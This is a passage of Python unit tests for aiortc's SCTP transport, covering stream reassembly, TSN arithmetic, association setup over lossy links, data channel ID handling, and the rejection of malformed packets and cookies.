self.factory.create([b'bar'], ordered=False) +
self.factory.create([b'baz'], ordered=False))
# feed second unfragmented
stream.add_chunk(chunks[1])
self.assertEqual(stream.reassembly, [chunks[1]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [(456, 123, b'bar')])
self.assertEqual(stream.reassembly, [])
self.assertEqual(stream.sequence_number, 0)
# feed third unfragmented
stream.add_chunk(chunks[2])
self.assertEqual(stream.reassembly, [chunks[2]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [(456, 123, b'baz')])
self.assertEqual(stream.reassembly, [])
self.assertEqual(stream.sequence_number, 0)
# feed first unfragmented
stream.add_chunk(chunks[0])
self.assertEqual(stream.reassembly, [chunks[0]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [(456, 123, b'foo')])
self.assertEqual(stream.reassembly, [])
self.assertEqual(stream.sequence_number, 0)
def test_unordered_with_fragments(self):
stream = InboundStream()
chunks = (
self.factory.create([b'foo', b'bar'], ordered=False) +
self.factory.create([b'baz'], ordered=False) +
self.factory.create([b'qux', b'quux', b'corge'], ordered=False))
# feed second fragment of first message
stream.add_chunk(chunks[1])
self.assertEqual(stream.reassembly, [chunks[1]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[1]])
self.assertEqual(stream.sequence_number, 0)
# feed second message
stream.add_chunk(chunks[2])
self.assertEqual(stream.reassembly, [chunks[1], chunks[2]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [(456, 123, b'baz')])
self.assertEqual(stream.reassembly, [chunks[1]])
self.assertEqual(stream.sequence_number, 0)
# feed first fragment of third message
stream.add_chunk(chunks[3])
self.assertEqual(stream.reassembly, [chunks[1], chunks[3]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[1], chunks[3]])
self.assertEqual(stream.sequence_number, 0)
# feed third fragment of third message
stream.add_chunk(chunks[5])
self.assertEqual(stream.reassembly, [chunks[1], chunks[3], chunks[5]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[1], chunks[3], chunks[5]])
self.assertEqual(stream.sequence_number, 0)
# feed second fragment of third message
stream.add_chunk(chunks[4])
self.assertEqual(stream.reassembly, [chunks[1], chunks[3], chunks[4], chunks[5]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [(456, 123, b'quxquuxcorge')])
self.assertEqual(stream.reassembly, [chunks[1]])
self.assertEqual(stream.sequence_number, 0)
# feed first fragment of first message
stream.add_chunk(chunks[0])
self.assertEqual(stream.reassembly, [chunks[0], chunks[1]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [(456, 123, b'foobar')])
self.assertEqual(stream.reassembly, [])
self.assertEqual(stream.sequence_number, 0)
def test_prune_chunks(self):
stream = InboundStream()
factory = ChunkFactory(tsn=100)
chunks = (
factory.create([b'foo', b'bar']) +
factory.create([b'baz', b'qux']))
for i in [1, 2]:
stream.add_chunk(chunks[i])
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[1], chunks[2]])
self.assertEqual(stream.sequence_number, 0)
stream.sequence_number = 2
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[1], chunks[2]])
self.assertEqual(stream.sequence_number, 2)
self.assertEqual(stream.prune_chunks(101), 3)
self.assertEqual(stream.reassembly, [chunks[2]])
self.assertEqual(stream.sequence_number, 2)
class SctpUtilTest(TestCase):
def test_tsn_minus_one(self):
self.assertEqual(tsn_minus_one(0), 4294967295)
self.assertEqual(tsn_minus_one(1), 0)
self.assertEqual(tsn_minus_one(4294967294), 4294967293)
self.assertEqual(tsn_minus_one(4294967295), 4294967294)
def test_tsn_plus_one(self):
self.assertEqual(tsn_plus_one(0), 1)
self.assertEqual(tsn_plus_one(1), 2)
self.assertEqual(tsn_plus_one(4294967294), 4294967295)
self.assertEqual(tsn_plus_one(4294967295), 0)
class RTCSctpTransportTest(TestCase):
def setUp(self):
self.client_transport, self.server_transport = dummy_dtls_transport_pair()
def tearDown(self):
run(self.client_transport.stop())
run(self.server_transport.stop())
def assertTimerPreserved(self, client):
test = self
class Ctx:
def __enter__(self):
self.previous_timer = client._t3_handle
def __exit__(self, exc_type, exc_value, traceback):
test.assertIsNotNone(client._t3_handle)
test.assertEqual(client._t3_handle, self.previous_timer)
return Ctx()
def assertTimerRestarted(self, client):
test = self
class Ctx:
def __enter__(self):
self.previous_timer = client._t3_handle
def __exit__(self, exc_type, exc_value, traceback):
test.assertIsNotNone(client._t3_handle)
test.assertNotEqual(client._t3_handle, self.previous_timer)
return Ctx()
def assertTimerStopped(self, client):
test = self
class Ctx:
def __enter__(self):
pass
def __exit__(self, exc_type, exc_value, traceback):
test.assertIsNone(client._t3_handle)
return Ctx()
def test_construct(self):
sctpTransport = RTCSctpTransport(self.client_transport)
self.assertEqual(sctpTransport.transport, self.client_transport)
self.assertEqual(sctpTransport.port, 5000)
def test_construct_invalid_dtls_transport_state(self):
run(self.client_transport.stop())
with self.assertRaises(InvalidStateError):
RTCSctpTransport(self.client_transport)
def test_connect_broken_transport(self):
"""
Transport with 100% loss never connects.
"""
loss_pattern = [True]
self.client_transport.transport._connection.loss_pattern = loss_pattern
self.server_transport.transport._connection.loss_pattern = loss_pattern
client = RTCSctpTransport(self.client_transport)
client._rto = 0.1
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
server._rto = 0.1
self.assertTrue(server.is_server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(client.state, 'closed')
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server.state, 'connecting')
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(client.state, 'closed')
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server.state, 'closed')
def test_connect_lossy_transport(self):
"""
Transport with 25% loss eventually connects.
"""
loss_pattern = [True, False, False, False]
self.client_transport.transport._connection.loss_pattern = loss_pattern
self.server_transport.transport._connection.loss_pattern = loss_pattern
client = RTCSctpTransport(self.client_transport)
client._rto = 0.1
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
server._rto = 0.1
self.assertTrue(server.is_server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client.state, 'connected')
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server.state, 'connected')
# transmit data
server_queue = asyncio.Queue()
async def server_fake_receive(*args):
await server_queue.put(args)
server._receive = server_fake_receive
for i in range(20):
message = (123, i, b'ping')
run(client._send(*message))
received = run(server_queue.get())
self.assertEqual(received, message)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(client.state, 'closed')
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server.state, 'closed')
def test_connect_client_limits_streams(self):
client = RTCSctpTransport(self.client_transport)
client._inbound_streams_max = 2048
client._outbound_streams_count = 256
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 2048)
self.assertEqual(client._outbound_streams_count, 256)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 256)
self.assertEqual(server._outbound_streams_count, 2048)
self.assertEqual(server._remote_extensions, [192, 130])
# client requests additional outbound streams
param = StreamAddOutgoingParam(
request_sequence=client._reconfig_request_seq,
new_streams=16)
run(client._send_reconfig_param(param))
run(asyncio.sleep(0.1))
self.assertEqual(server._inbound_streams_count, 272)
self.assertEqual(server._outbound_streams_count, 2048)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_server_limits_streams(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
server._inbound_streams_max = 2048
server._outbound_streams_count = 256
self.assertTrue(server.is_server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 256)
self.assertEqual(client._outbound_streams_count, 2048)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 2048)
self.assertEqual(server._outbound_streams_count, 256)
self.assertEqual(server._remote_extensions, [192, 130])
run(asyncio.sleep(0.1))
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_then_client_creates_data_channel(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
client_channels = track_channels(client)
server_channels = track_channels(server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 65535)
self.assertEqual(client._outbound_streams_count, 65535)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 65535)
self.assertEqual(server._outbound_streams_count, 65535)
self.assertEqual(server._remote_extensions, [192, 130])
# create data channel
channel = RTCDataChannel(client, RTCDataChannelParameters(label='chat'))
self.assertEqual(channel.id, None)
self.assertEqual(channel.label, 'chat')
run(asyncio.sleep(0.1))
self.assertEqual(channel.id, 1)
self.assertEqual(channel.label, 'chat')
self.assertEqual(len(client_channels), 0)
self.assertEqual(len(server_channels), 1)
self.assertEqual(server_channels[0].id, 1)
self.assertEqual(server_channels[0].label, 'chat')
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_then_client_creates_data_channel_with_custom_id(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
client_channels = track_channels(client)
server_channels = track_channels(server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 65535)
self.assertEqual(client._outbound_streams_count, 65535)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 65535)
self.assertEqual(server._outbound_streams_count, 65535)
self.assertEqual(server._remote_extensions, [192, 130])
# create data channel
channel = RTCDataChannel(client, RTCDataChannelParameters(label='chat', id=100))
self.assertEqual(channel.id, 100)
self.assertEqual(channel.label, 'chat')
# create second data channel
channel2 = RTCDataChannel(client, RTCDataChannelParameters(label='chat', id=101))
self.assertEqual(channel2.id, 101)
self.assertEqual(channel2.label, 'chat')
run(asyncio.sleep(0.1))
self.assertEqual(channel.id, 100)
self.assertEqual(channel.label, 'chat')
self.assertEqual(channel2.id, 101)
self.assertEqual(channel2.label, 'chat')
self.assertEqual(len(client_channels), 0)
self.assertEqual(len(server_channels), 2)
self.assertEqual(server_channels[0].id, 100)
self.assertEqual(server_channels[0].label, 'chat')
self.assertEqual(server_channels[1].id, 101)
self.assertEqual(server_channels[1].label, 'chat')
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_then_client_creates_data_channel_with_custom_id_and_then_normal(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
client_channels = track_channels(client)
server_channels = track_channels(server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 65535)
self.assertEqual(client._outbound_streams_count, 65535)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 65535)
self.assertEqual(server._outbound_streams_count, 65535)
self.assertEqual(server._remote_extensions, [192, 130])
# create data channel
channel = RTCDataChannel(client, RTCDataChannelParameters(label='chat', id=1))
self.assertEqual(channel.id, 1)
self.assertEqual(channel.label, 'chat')
# create second data channel
channel2 = RTCDataChannel(client, RTCDataChannelParameters(label='chat'))
self.assertEqual(channel2.id, None)
self.assertEqual(channel2.label, 'chat')
run(asyncio.sleep(0.1))
self.assertEqual(channel.id, 1)
self.assertEqual(channel.label, 'chat')
self.assertEqual(channel2.id, 3)
self.assertEqual(channel2.label, 'chat')
self.assertEqual(len(client_channels), 0)
self.assertEqual(len(server_channels), 2)
self.assertEqual(server_channels[0].id, 1)
self.assertEqual(server_channels[0].label, 'chat')
self.assertEqual(server_channels[1].id, 3)
self.assertEqual(server_channels[1].label, 'chat')
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_then_client_creates_second_data_channel_with_custom_already_used_id(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
client_channels = track_channels(client)
server_channels = track_channels(server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 65535)
self.assertEqual(client._outbound_streams_count, 65535)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 65535)
self.assertEqual(server._outbound_streams_count, 65535)
self.assertEqual(server._remote_extensions, [192, 130])
# create data channel
channel = RTCDataChannel(client, RTCDataChannelParameters(label='chat', id=100))
self.assertEqual(channel.id, 100)
self.assertEqual(channel.label, 'chat')
# create second data channel with the same id
self.assertRaises(ValueError,
lambda: RTCDataChannel(client,
RTCDataChannelParameters(label='chat', id=100)))
run(asyncio.sleep(0.1))
self.assertEqual(channel.id, 100)
self.assertEqual(channel.label, 'chat')
self.assertEqual(len(client_channels), 0)
self.assertEqual(len(server_channels), 1)
self.assertEqual(server_channels[0].id, 100)
self.assertEqual(server_channels[0].label, 'chat')
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_then_client_creates_negotiated_data_channel_without_id(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 65535)
self.assertEqual(client._outbound_streams_count, 65535)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 65535)
self.assertEqual(server._outbound_streams_count, 65535)
self.assertEqual(server._remote_extensions, [192, 130])
# create data channel
self.assertRaises(
ValueError,
lambda: RTCDataChannel(
client,
RTCDataChannelParameters(
label="chat", negotiated=True
),
),
)
run(asyncio.sleep(0.1))
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_then_client_and_server_creates_negotiated_data_channel(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
client_channels = track_channels(client)
server_channels = track_channels(server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 65535)
self.assertEqual(client._outbound_streams_count, 65535)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 65535)
self.assertEqual(server._outbound_streams_count, 65535)
self.assertEqual(server._remote_extensions, [192, 130])
# create data channel for client
channel_client = RTCDataChannel(
client,
RTCDataChannelParameters(
label="chat", negotiated=True, id=100
),
)
self.assertEqual(channel_client.id, 100)
self.assertEqual(channel_client.label, "chat")
# create data channel for server
channel_server = RTCDataChannel(
server,
RTCDataChannelParameters(
label="chat", negotiated=True, id=100
),
)
self.assertEqual(channel_server.id, 100)
self.assertEqual(channel_server.label, "chat")
run(asyncio.sleep(0.1))
self.assertEqual(channel_client.id, 100)
self.assertEqual(channel_client.label, 'chat')
self.assertEqual(channel_server.id, 100)
self.assertEqual(channel_server.label, 'chat')
# both arrays should be 0 as they track data channels created by event
# which is not the case in out-of-band
self.assertEqual(len(client_channels), 0)
self.assertEqual(len(server_channels), 0)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_then_client_creates_negotiated_data_channel_with_used_id(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
client_channels = track_channels(client)
server_channels = track_channels(server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 65535)
self.assertEqual(client._outbound_streams_count, 65535)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 65535)
self.assertEqual(server._outbound_streams_count, 65535)
self.assertEqual(server._remote_extensions, [192, 130])
# create data channel for client
channel_client = RTCDataChannel(
client,
RTCDataChannelParameters(
label="chat", negotiated=True, id=100
),
)
self.assertEqual(channel_client.id, 100)
self.assertEqual(channel_client.label, "chat")
self.assertRaises(
ValueError,
lambda: RTCDataChannel(
client,
RTCDataChannelParameters(
label="chat", negotiated=True, id=100
),
),
)
run(asyncio.sleep(0.1))
self.assertEqual(channel_client.id, 100)
self.assertEqual(channel_client.label, 'chat')
# both arrays should be 0 as they track data channels created by event
# which is not the case in out-of-band
self.assertEqual(len(client_channels), 0)
self.assertEqual(len(server_channels), 0)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_then_client_and_server_creates_negotiated_data_channel_before_transport(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
client_channels = track_channels(client)
server_channels = track_channels(server)
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
# create data channel for client
channel_client = RTCDataChannel(
client,
RTCDataChannelParameters(
label="chat", negotiated=True, id=100
),
)
self.assertEqual(channel_client.id, 100)
self.assertEqual(channel_client.label, "chat")
self.assertEqual(channel_client.readyState, "connecting")
# create data channel for server
channel_server = RTCDataChannel(
server,
RTCDataChannelParameters(
label="chat", negotiated=True, id=100
),
)
self.assertEqual(channel_server.id, 100)
self.assertEqual(channel_server.label, "chat")
self.assertEqual(channel_server.readyState, "connecting")
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 65535)
self.assertEqual(client._outbound_streams_count, 65535)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 65535)
self.assertEqual(server._outbound_streams_count, 65535)
self.assertEqual(server._remote_extensions, [192, 130])
self.assertEqual(channel_client.readyState, 'open')
self.assertEqual(channel_server.readyState, 'open')
run(asyncio.sleep(0.1))
self.assertEqual(channel_client.id, 100)
self.assertEqual(channel_client.label, 'chat')
self.assertEqual(channel_server.id, 100)
self.assertEqual(channel_server.label, 'chat')
# both arrays should be 0 as they track data channels created by event
# which is not the case in out-of-band
self.assertEqual(len(client_channels), 0)
self.assertEqual(len(server_channels), 0)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_then_server_creates_data_channel(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
client_channels = track_channels(client)
server_channels = track_channels(server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._remote_extensions, [192, 130])
# create data channel
channel = RTCDataChannel(server, RTCDataChannelParameters(label='chat'))
self.assertEqual(channel.id, None)
self.assertEqual(channel.label, 'chat')
run(asyncio.sleep(0.1))
self.assertEqual(len(client_channels), 1)
self.assertEqual(client_channels[0].id, 0)
self.assertEqual(client_channels[0].label, 'chat')
self.assertEqual(len(server_channels), 0)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
@patch('aiortc.rtcsctptransport.logger.isEnabledFor')
def test_connect_with_logging(self, mock_is_enabled_for):
mock_is_enabled_for.return_value = True
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_with_partial_reliability(self):
client = RTCSctpTransport(self.client_transport)
client._local_partial_reliability = True
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
server._local_partial_reliability = False
self.assertTrue(server.is_server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._remote_extensions, [130])
self.assertEqual(client._remote_partial_reliability, False)
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._remote_extensions, [192, 130])
self.assertEqual(server._remote_partial_reliability, True)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_abrupt_disconnect(self):
"""
Abrupt disconnect causes sending ABORT chunk to fail.
"""
client = RTCSctpTransport(self.client_transport)
server = RTCSctpTransport(self.server_transport)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
# break connection
run(self.client_transport.stop())
run(self.server_transport.stop())
# stop
run(client.stop())
run(server.stop())
def test_garbage(self):
server = RTCSctpTransport(self.server_transport)
run(server.start(RTCSctpCapabilities(maxMessageSize=65536), 5000))
asyncio.ensure_future(self.client_transport._send_data(b'garbage'))
# check outcome
run(asyncio.sleep(0.1))
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
# shutdown
run(server.stop())
def test_bad_verification_tag(self):
# verification tag is 12345 instead of 0
data = load('sctp_init_bad_verification.bin')
server = RTCSctpTransport(self.server_transport)
run(server.start(RTCSctpCapabilities(maxMessageSize=65536), 5000))
asyncio.ensure_future(self.client_transport._send_data(data))
# check outcome
run(asyncio.sleep(0.1))
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
# shutdown
run(server.stop())
def test_bad_cookie(self):
client = RTCSctpTransport(self.client_transport)
server = RTCSctpTransport(self.server_transport)
# corrupt cookie
real_send_chunk = client._send_chunk
async def mock_send_chunk(chunk):
if isinstance(chunk, CookieEchoChunk):
chunk.body = b'garbage'
return await real_send_chunk(chunk)
client._send_chunk = mock_send_chunk
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(asyncio.sleep(0.1))
self.assertEqual(client._association_state, RTCSctpTransport.State.COOKIE_ECHOED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_maybe_abandon(self):
async def mock_send_chunk(chunk):
pass
client = RTCSctpTransport(self.client_transport)
client._local_tsn = 0
client._send_chunk = mock_send_chunk
# send 3 chunks
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH * 3))
self.assertEqual(outstanding_tsns(client), [0, 1, 2])
self.assertEqual(queued_tsns(client), [])
for chunk in client._outbound_queue:
self.assertEqual(chunk._abandoned, False)
# try abandon middle chunk
client._maybe_abandon(client._sent_queue[1])
for chunk in client._outbound_queue:
self.assertEqual(chunk._abandoned, False)
def test_maybe_abandon_max_retransmits(self):
async def mock_send_chunk(chunk):
pass
client = RTCSctpTransport(self.client_transport)
client._local_tsn = 1
client._last_sacked_tsn = 0
client._advanced_peer_ack_tsn = 0
client._send_chunk = mock_send_chunk
# send 3 chunks
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH * 3, max_retransmits=0))
self.assertEqual(outstanding_tsns(client), [1, 2, 3])
self.assertEqual(queued_tsns(client), [])
self.assertEqual(client._local_tsn, 4)
self.assertEqual(client._advanced_peer_ack_tsn, 0)
for chunk in client._outbound_queue:
self.assertEqual(chunk._abandoned, False)
# try abandon middle chunk
client._maybe_abandon(client._sent_queue[1])
for chunk in client._outbound_queue:
self.assertEqual(chunk._abandoned, True)
# try abandon middle chunk (again)
client._maybe_abandon(client._sent_queue[1])
for chunk in client._outbound_queue:
self.assertEqual(chunk._abandoned, True)
# update advanced peer ack point
client._update_advanced_peer_ack_point()
self.assertEqual(outstanding_tsns(client), [])
self.assertEqual(queued_tsns(client), [])
self.assertEqual(client._advanced_peer_ack_tsn, 3)
# check forward TSN
self.assertIsNotNone(client._forward_tsn_chunk)
self.assertEqual(client._forward_tsn_chunk.cumulative_tsn, 3)
self.assertEqual(client._forward_tsn_chunk.streams, [(123, 0)])
# transmit
client._t3_cancel()
run(client._transmit())
self.assertIsNone(client._forward_tsn_chunk)
self.assertIsNotNone(client._t3_handle)
def test_stale_cookie(self):
def mock_timestamp():
mock_timestamp.calls += 1
if mock_timestamp.calls == 1:
return 0
else:
return 61
mock_timestamp.calls = 0
client = RTCSctpTransport(self.client_transport)
server = RTCSctpTransport(self.server_transport)
server._get_timestamp = mock_timestamp
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(asyncio.sleep(0.1))
